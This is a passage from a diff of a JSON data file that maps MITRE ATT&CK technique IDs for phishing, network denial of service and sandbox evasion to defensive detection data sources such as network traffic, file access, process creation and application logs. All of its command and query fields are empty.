(e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1497.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1498.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1498.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1566.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1566.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1566", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + 